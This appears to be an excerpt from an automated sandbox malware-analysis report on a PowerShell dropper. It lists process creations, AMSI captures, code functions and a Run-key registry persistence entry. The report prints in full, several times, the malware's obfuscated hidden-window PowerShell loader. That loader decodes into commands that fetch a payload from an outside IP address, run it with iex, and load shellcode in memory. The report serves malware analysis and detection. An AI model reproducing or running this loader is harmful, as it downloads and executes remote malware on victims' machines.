              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Fedthasenes)$global:Kasinoernes = [System.Text.Encoding]::ASCII.GetString($Strghandlens)$global:Tommie=$Kasinoernes.substring(298043,27863)<#Staynil Stningsbygningerne Gneu Fangetran
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Unexpressibleness $Bagladeren $Admissus221), (Unmuscularly @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Hydrogenolysis = [AppDomain]::CurrentDomain.GetA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Retspraksisenes)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Supercapableness, $false).DefineType($Ext
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Fedthasenes)$global:Kasinoernes = [System.Text.Encoding]::ASCII.GetString($Strghandlens)$global:Tommie=$Kasinoernes.substring(298043,27863)<#Staynil Stningsbygningerne Gneu Fangetran
              Suspicious powershell command line found
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Nabolandenes = 1;$Kapsle='S';$Kapsle+='ubstrin';$Kapsle+='g';Function Handig($Fyldepenneblkket){$Bytteforholdet=$Fyldepenneblkket.Length-$Nabolandenes;For($Columbaries=4; $Columbaries -lt $Bytteforholdet; $Columbaries+=(5)){$Festskriftets+=$Fyldepenneblkket.$Kapsle.Invoke( $Columbaries, $Nabolandenes);}$Festskriftets;}function Xerotherm($Drapers){& ($Normalprisen) ($Drapers);}$Palmehavers=Handig 'K njMResaoAfstznedsiFestl urlFokuaUnr /half5Re,u. Unb0bld Tan(PostWFrekiSpeenGarddv,cioInf.wSings Hea BracN RoqTL.at Babo1D,mi0Qq.a.Sten0Prop;Thec DefiWNonciEtagnOpry6Amel4Topc;Gela HetzxIndk6Comp4F.rt;Bill Erhvr Denv N.n:.syc1Basi2sdsu1ge t.Jens0 Spa)Prim UnboGStameSleec,fskkLovloMain/ .om2Nulp0Carb1F rr0Reor0Offi1.ykk0Ahis1Tffe TreF Twoiunwrr DiseSvrdfGattos,rix Ibr/Poli1Far.2Dump1 As .Enhy0Thus ';$Nysseliges=Handig ',undU Eges ignesnotr Ins-AlbuA,lleg,useeUpstnIsoitAnni ';$Fordommes=Handig ' odeh ZigtGacatJ,jup Fl,:.ent/B gg/ lor8Aden7Tors.Do.m1Mult2 Und1dy,n.unbr1cute0 Reg5Appl.Mast1 ic6A mb3Dete/FiltTUnexeKonsrwa.smAut.i rovnSka.aStocl PatjBipaoTigebD sk.OvertMetaoEkspcRhab ';$Problemanalysernes=Handig 'Uro.>Fe.l ';$Normalprisen=Handig 'Mic.iSkaaeRegex Str ';$Schizophasia='Heterozygotes';Xerotherm (Handig 'UndeSRegoePas.tDehu- Je C Stio UnsnGeomtUnteeTalln Re.tSpir Stil-BeatPImpra StetplurhSl.g Ko,mT H.b:Part\Sp,nK.also,mpir AlysNitre W mtSemisMonr.T.att Ch xs,nstDisp ,fsk-FuglV La,aTipslSkaruLa,se Bo lr t$ uscSMisac HydhR.kei looz KigoRep.pLderhAcicaDisrsAppeiAggra,rro;Ge e ');Xerotherm (Handig ' S,pi Chef ,or Labr(AaletFacoe TorsDub tindk- StrpMalaaHeavtTi.eh,ndi H neT Li.:sp l\DemoKAbsooRekorMenisA.foeUnsctUn es.eta.UnibtBentx Adet A.s)Kvin{eksae Pasx,oeci RentEqua} Fer;trop ');$Wedeln = Handig 'NonmedemycBedeh iewoFor edan%kon.al,plpFarmpMakedAra aWoodtBisuaRaft% Gen\Ma,ePRikslTilleSpaau oodrFun.oSenstForbhC.mpoLys,t Tito Ca nUnblu Ma,sAmer.ImprDDistiDi,il Las Gara&Post&Staf C,loeF.tocGennhFangoChi, Tor$Over ';Xerotherm (Handig 'tore$ mangOthilTriloUnstbTr,na.aval ove:paabSOpt.w EngeDir.eLus pAntryT pe=Gaze(S ecc StrmPnhedUdda Fejl/,avlcPr t Utl$,agsWTrine,ilbd DydeFly.lTy.inKar.)Plat ');Xerotherm (Handig 'Pr s$BriegStral ,odoNo,ib ,ndaIntelSu.e:FacoD CleeDo.ab PriaNarktbeeftKonte VaraBramtUds.rCam eIc.nn StoeUtths Reu=Tall$PlamFAn.no F rrStradc.iboDisgmNstemIns,eKlarsCali.Pr bsdetepKr,vlReaciSangt Urf(Gill$TeisP Sk.rE spoPrombB tol DomeCuttmT,lda.allnRhamaJordlopryyPicksWo keArtsrBox.n PrleA,etsAfsp)Slad ');$Fordommes=$Debatteatrenes[0];Xerotherm (Handig ' era$Leucg irklSpeeoF.nabEncaaBal,lCent:B atUStj.rOplaeAmphtGeore f arSouroBagggfor.r ephaLoc.pA sehBars=AlfaN redeKaglwBlyg- accO AntbForlj BoneUgudcAntetDiff LogaSPulvyKonfs A btBilleN,dumMikr.AtomNSysteHetetM.ni.,andWMarke.ussb Si.CS lvlPh.ni P,ceNondnQuintOpsp ');Xerotherm (Handig 'Spin$,jouUBehjrAnt,eTro,tAfstebrikrI.dsoArbegSupprAdgaaReflp Ambh Ec..ToplHGlobeS,beaBedudgrateMor.
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Nabolandenes = 1;$Kapsle='S';$Kapsle+='ubstrin';$Kapsle+='g';Function Handig($Fyldepenneblkket){$Bytteforholdet=$Fyldepenneblkket.Length-$Nabolandenes;For($Columbaries=4; $Columbaries -lt $Bytteforholdet; $Columbaries+=(5)){$Festskriftets+=$Fyldepenneblkket.$Kapsle.Invoke( $Columbaries, $Nabolandenes);}$Festskriftets;}function Xerotherm($Drapers){& ($Normalprisen) ($Drapers);}$Palmehavers=Handig 'K njMResaoAfstznedsiFestl urlFokuaUnr /half5Re,u. Unb0bld Tan(PostWFrekiSpeenGarddv,cioInf.wSings Hea BracN RoqTL.at Babo1D,mi0Qq.a.Sten0Prop;Thec DefiWNonciEtagnOpry6Amel4Topc;Gela HetzxIndk6Comp4F.rt;Bill Erhvr Denv N.n:.syc1Basi2sdsu1ge t.Jens0 Spa)Prim UnboGStameSleec,fskkLovloMain/ .om2Nulp0Carb1F rr0Reor0Offi1.ykk0Ahis1Tffe TreF Twoiunwrr DiseSvrdfGattos,rix Ibr/Poli1Far.2Dump1 As .Enhy0Thus ';$Nysseliges=Handig ',undU Eges ignesnotr Ins-AlbuA,lleg,useeUpstnIsoitAnni ';$Fordommes=Handig ' odeh ZigtGacatJ,jup Fl,:.ent/B gg/ lor8Aden7Tors.Do.m1Mult2 Und1dy,n.unbr1cute0 Reg5Appl.Mast1 ic6A mb3Dete/FiltTUnexeKonsrwa.smAut.i rovnSka.aStocl PatjBipaoTigebD sk.OvertMetaoEkspcRhab ';$Problemanalysernes=Handig 'Uro.>Fe.l ';$Normalprisen=Handig 'Mic.iSkaaeRegex Str ';$Schizophasia='Heterozygotes';Xerotherm (Handig 'UndeSRegoePas.tDehu- Je C Stio UnsnGeomtUnteeTalln Re.tSpir Stil-BeatPImpra StetplurhSl.g Ko,mT H.b:Part\Sp,nK.also,mpir AlysNitre W mtSemisMonr.T.att Ch xs,nstDisp ,fsk-FuglV La,aTipslSkaruLa,se Bo lr t$ uscSMisac HydhR.kei looz KigoRep.pLderhAcicaDisrsAppeiAggra,rro;Ge e ');Xerotherm (Handig ' S,pi Chef ,or Labr(AaletFacoe TorsDub tindk- StrpMalaaHeavtTi.eh,ndi H neT Li.:sp l\DemoKAbsooRekorMenisA.foeUnsctUn es.eta.UnibtBentx Adet A.s)Kvin{eksae Pasx,oeci RentEqua} Fer;trop ');$Wedeln = Handig 'NonmedemycBedeh iewoFor edan%kon.al,plpFarmpMakedAra aWoodtBisuaRaft% Gen\Ma,ePRikslTilleSpaau oodrFun.oSenstForbhC.mpoLys,t Tito Ca nUnblu Ma,sAmer.ImprDDistiDi,il Las Gara&Post&Staf C,loeF.tocGennhFangoChi, Tor$Over ';Xerotherm (Handig 'tore$ mangOthilTriloUnstbTr,na.aval ove:paabSOpt.w EngeDir.eLus pAntryT pe=Gaze(S ecc StrmPnhedUdda Fejl/,avlcPr t Utl$,agsWTrine,ilbd DydeFly.lTy.inKar.)Plat ');Xerotherm (Handig 'Pr s$BriegStral ,odoNo,ib ,ndaIntelSu.e:FacoD CleeDo.ab PriaNarktbeeftKonte VaraBramtUds.rCam eIc.nn StoeUtths Reu=Tall$PlamFAn.no F rrStradc.iboDisgmNstemIns,eKlarsCali.Pr bsdetepKr,vlReaciSangt Urf(Gill$TeisP Sk.rE spoPrombB tol DomeCuttmT,lda.allnRhamaJordlopryyPicksWo keArtsrBox.n PrleA,etsAfsp)Slad ');$Fordommes=$Debatteatrenes[0];Xerotherm (Handig ' era$Leucg irklSpeeoF.nabEncaaBal,lCent:B atUStj.rOplaeAmphtGeore f arSouroBagggfor.r ephaLoc.pA sehBars=AlfaN redeKaglwBlyg- accO AntbForlj BoneUgudcAntetDiff LogaSPulvyKonfs A btBilleN,dumMikr.AtomNSysteHetetM.ni.,andWMarke.ussb Si.CS lvlPh.ni P,ceNondnQuintOpsp ');Xerotherm (Handig 'Spin$,jouUBehjrAnt,eTro,tAfstebrikrI.dsoArbegSupprAdgaaReflp Ambh Ec..ToplH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Nabolandenes = 1;$Kapsle='S';$Kapsle+='ubstrin';$Kapsle+='g';Function Handig($Fyldepenneblkket){$Bytteforholdet=$Fyldepenneblkket.Length-$Nabolandenes;For($Columbaries=4; $Columbaries -lt $Bytteforholdet; $Columbaries+=(5)){$Festskriftets+=$Fyldepenneblkket.$Kapsle.Invoke( $Columbaries, $Nabolandenes);}$Festskriftets;}function Xerotherm($Drapers){& ($Normalprisen) ($Drapers);}$Palmehavers=Handig 'K njMResaoAfstznedsiFestl urlFokuaUnr /half5Re,u. Unb0bld Tan(PostWFrekiSpeenGarddv,cioInf.wSings Hea BracN RoqTL.at Babo1D,mi0Qq.a.Sten0Prop;Thec DefiWNonciEtagnOpry6Amel4Topc;Gela HetzxIndk6Comp4F.rt;Bill Erhvr Denv N.n:.syc1Basi2sdsu1ge t.Jens0 Spa)Prim UnboGStameSleec,fskkLovloMain/ .om2Nulp0Carb1F rr0Reor0Offi1.ykk0Ahis1Tffe TreF Twoiunwrr DiseSvrdfGattos,rix Ibr/Poli1Far.2Dump1 As .Enhy0Thus ';$Nysseliges=Handig ',undU Eges ignesnotr Ins-AlbuA,lleg,useeUpstnIsoitAnni ';$Fordommes=Handig ' odeh ZigtGacatJ,jup Fl,:.ent/B gg/ lor8Aden7Tors.Do.m1Mult2 Und1dy,n.unbr1cute0 Reg5Appl.Mast1 ic6A mb3Dete/FiltTUnexeKonsrwa.smAut.i rovnSka.aStocl PatjBipaoTigebD sk.OvertMetaoEkspcRhab ';$Problemanalysernes=Handig 'Uro.>Fe.l ';$Normalprisen=Handig 'Mic.iSkaaeRegex Str ';$Schizophasia='Heterozygotes';Xerotherm (Handig 'UndeSRegoePas.tDehu- Je C Stio UnsnGeomtUnteeTalln Re.tSpir Stil-BeatPImpra StetplurhSl.g Ko,mT H.b:Part\Sp,nK.also,mpir AlysNitre W mtSemisMonr.T.att Ch xs,nstDisp ,fsk-FuglV La,aTipslSkaruLa,se Bo lr t$ uscSMisac HydhR.kei looz KigoRep.pLderhAcicaDisrsAppeiAggra,rro;Ge e ');Xerotherm (Handig ' S,pi Chef ,or Labr(AaletFacoe TorsDub tindk- StrpMalaaHeavtTi.eh,ndi H neT Li.:sp l\DemoKAbsooRekorMenisA.foeUnsctUn es.eta.UnibtBentx Adet A.s)Kvin{eksae Pasx,oeci RentEqua} Fer;trop ');$Wedeln = Handig 'NonmedemycBedeh iewoFor edan%kon.al,plpFarmpMakedAra aWoodtBisuaRaft% Gen\Ma,ePRikslTilleSpaau oodrFun.oSenstForbhC.mpoLys,t Tito Ca nUnblu Ma,sAmer.ImprDDistiDi,il Las Gara&Post&Staf C,loeF.tocGennhFangoChi, Tor$Over ';Xerotherm (Handig 'tore$ mangOthilTriloUnstbTr,na.aval ove:paabSOpt.w EngeDir.eLus pAntryT pe=Gaze(S ecc StrmPnhedUdda Fejl/,avlcPr t Utl$,agsWTrine,ilbd DydeFly.lTy.inKar.)Plat ');Xerotherm (Handig 'Pr s$BriegStral ,odoNo,ib ,ndaIntelSu.e:FacoD CleeDo.ab PriaNarktbeeftKonte VaraBramtUds.rCam eIc.nn StoeUtths Reu=Tall$PlamFAn.no F rrStradc.iboDisgmNstemIns,eKlarsCali.Pr bsdetepKr,vlReaciSangt Urf(Gill$TeisP Sk.rE spoPrombB tol DomeCuttmT,lda.allnRhamaJordlopryyPicksWo keArtsrBox.n PrleA,etsAfsp)Slad ');$Fordommes=$Debatteatrenes[0];Xerotherm (Handig ' era$Leucg irklSpeeoF.nabEncaaBal,lCent:B atUStj.rOplaeAmphtGeore f arSouroBagggfor.r ephaLoc.pA sehBars=AlfaN redeKaglwBlyg- accO AntbForlj BoneUgudcAntetDiff LogaSPulvyKonfs A btBilleN,dumMikr.AtomNSysteHetetM.ni.,andWMarke.ussb Si.CS lvlPh.ni P,ceNondnQuintOpsp ');Xerotherm (Handig 'Spin$,jouUBehjrAnt,eTro,tAfstebrikrI.dsoArbegSupprAdgaaReflp Ambh Ec..ToplHGlobeS,beaBedudgrateMor.Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Nabolandenes = 1;$Kapsle='S';$Kapsle+='ubstrin';$Kapsle+='g';Function Handig($Fyldepenneblkket){$Bytteforholdet=$Fyldepenneblkket.Length-$Nabolandenes;For($Columbaries=4; $Columbaries -lt $Bytteforholdet; $Columbaries+=(5)){$Festskriftets+=$Fyldepenneblkket.$Kapsle.Invoke( $Columbaries, $Nabolandenes);}$Festskriftets;}function Xerotherm($Drapers){& ($Normalprisen) ($Drapers);}$Palmehavers=Handig 'K njMResaoAfstznedsiFestl urlFokuaUnr /half5Re,u. Unb0bld Tan(PostWFrekiSpeenGarddv,cioInf.wSings Hea BracN RoqTL.at Babo1D,mi0Qq.a.Sten0Prop;Thec DefiWNonciEtagnOpry6Amel4Topc;Gela HetzxIndk6Comp4F.rt;Bill Erhvr Denv N.n:.syc1Basi2sdsu1ge t.Jens0 Spa)Prim UnboGStameSleec,fskkLovloMain/ .om2Nulp0Carb1F rr0Reor0Offi1.ykk0Ahis1Tffe TreF Twoiunwrr DiseSvrdfGattos,rix Ibr/Poli1Far.2Dump1 As .Enhy0Thus ';$Nysseliges=Handig ',undU Eges ignesnotr Ins-AlbuA,lleg,useeUpstnIsoitAnni ';$Fordommes=Handig ' odeh ZigtGacatJ,jup Fl,:.ent/B gg/ lor8Aden7Tors.Do.m1Mult2 Und1dy,n.unbr1cute0 Reg5Appl.Mast1 ic6A mb3Dete/FiltTUnexeKonsrwa.smAut.i rovnSka.aStocl PatjBipaoTigebD sk.OvertMetaoEkspcRhab ';$Problemanalysernes=Handig 'Uro.>Fe.l ';$Normalprisen=Handig 'Mic.iSkaaeRegex Str ';$Schizophasia='Heterozygotes';Xerotherm (Handig 'UndeSRegoePas.tDehu- Je C Stio UnsnGeomtUnteeTalln Re.tSpir Stil-BeatPImpra StetplurhSl.g Ko,mT H.b:Part\Sp,nK.also,mpir AlysNitre W mtSemisMonr.T.att Ch xs,nstDisp ,fsk-FuglV La,aTipslSkaruLa,se Bo lr t$ uscSMisac HydhR.kei looz KigoRep.pLderhAcicaDisrsAppeiAggra,rro;Ge e ');Xerotherm (Handig ' S,pi Chef ,or Labr(AaletFacoe TorsDub tindk- StrpMalaaHeavtTi.eh,ndi H neT Li.:sp l\DemoKAbsooRekorMenisA.foeUnsctUn es.eta.UnibtBentx Adet A.s)Kvin{eksae Pasx,oeci RentEqua} Fer;trop ');$Wedeln = Handig 'NonmedemycBedeh iewoFor edan%kon.al,plpFarmpMakedAra aWoodtBisuaRaft% Gen\Ma,ePRikslTilleSpaau oodrFun.oSenstForbhC.mpoLys,t Tito Ca nUnblu Ma,sAmer.ImprDDistiDi,il Las Gara&Post&Staf C,loeF.tocGennhFangoChi, Tor$Over ';Xerotherm (Handig 'tore$ mangOthilTriloUnstbTr,na.aval ove:paabSOpt.w EngeDir.eLus pAntryT pe=Gaze(S ecc StrmPnhedUdda Fejl/,avlcPr t Utl$,agsWTrine,ilbd DydeFly.lTy.inKar.)Plat ');Xerotherm (Handig 'Pr s$BriegStral ,odoNo,ib ,ndaIntelSu.e:FacoD CleeDo.ab PriaNarktbeeftKonte VaraBramtUds.rCam eIc.nn StoeUtths Reu=Tall$PlamFAn.no F rrStradc.iboDisgmNstemIns,eKlarsCali.Pr bsdetepKr,vlReaciSangt Urf(Gill$TeisP Sk.rE spoPrombB tol DomeCuttmT,lda.allnRhamaJordlopryyPicksWo keArtsrBox.n PrleA,etsAfsp)Slad ');$Fordommes=$Debatteatrenes[0];Xerotherm (Handig ' era$Leucg irklSpeeoF.nabEncaaBal,lCent:B atUStj.rOplaeAmphtGeore f arSouroBagggfor.r ephaLoc.pA sehBars=AlfaN redeKaglwBlyg- accO AntbForlj BoneUgudcAntetDiff LogaSPulvyKonfs A btBilleN,dumMikr.AtomNSysteHetetM.ni.,andWMarke.ussb Si.CS lvlPh.ni P,ceNondnQuintOpsp ');Xerotherm (Handig 'Spin$,jouUBehjrAnt,eTro,tAfstebrikrI.dsoArbegSupprAdgaaReflp Ambh Ec..ToplHJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BA00347 push esi; retf 2_2_00007FFD9BA00376
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BA00327 pushad ; retf 2_2_00007FFD9BA00346
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BA04E2B push ss; retf 2_2_00007FFD9BA04E46
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BA04D8B push ss; retf 2_2_00007FFD9BA04E46
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BA0018D push ds; retf 2_2_00007FFD9BA001B6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BA00108 push ds; retf 2_2_00007FFD9BA001B6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BA0792D push ebx; retf 2_2_00007FFD9BA0796A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BA000BD pushad ; iretd 2_2_00007FFD9BA000C1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07D2AD81 push FFFFFF8Bh; iretd 5_2_07D2AD83
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07D2B11F push FFFFFF8Bh; iretd 5_2_07D2B121
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07D200D1 push eax; iretd 5_2_07D200ED
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07D2AAFA push FFFFFF8Bh; iretd 5_2_07D2AB09
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07D2AA98 push FFFFFF8Bh; iretd 5_2_07D2AA9D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07D2B0B3 push FFFFFF8Bh; iretd 5_2_07D2B0B5
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07D20ABF push eax; mov dword ptr [esp], ecx5_2_07D20AC4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07D22C74 push FFFFFF8Bh; iretd 5_2_07D22C7D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07D2AC7B push FFFFFF8Bh; iretd 5_2_07D2AC89
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07D2007F push eax; iretd 5_2_07D200ED
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StagenesJump to behavior
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StagenesJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
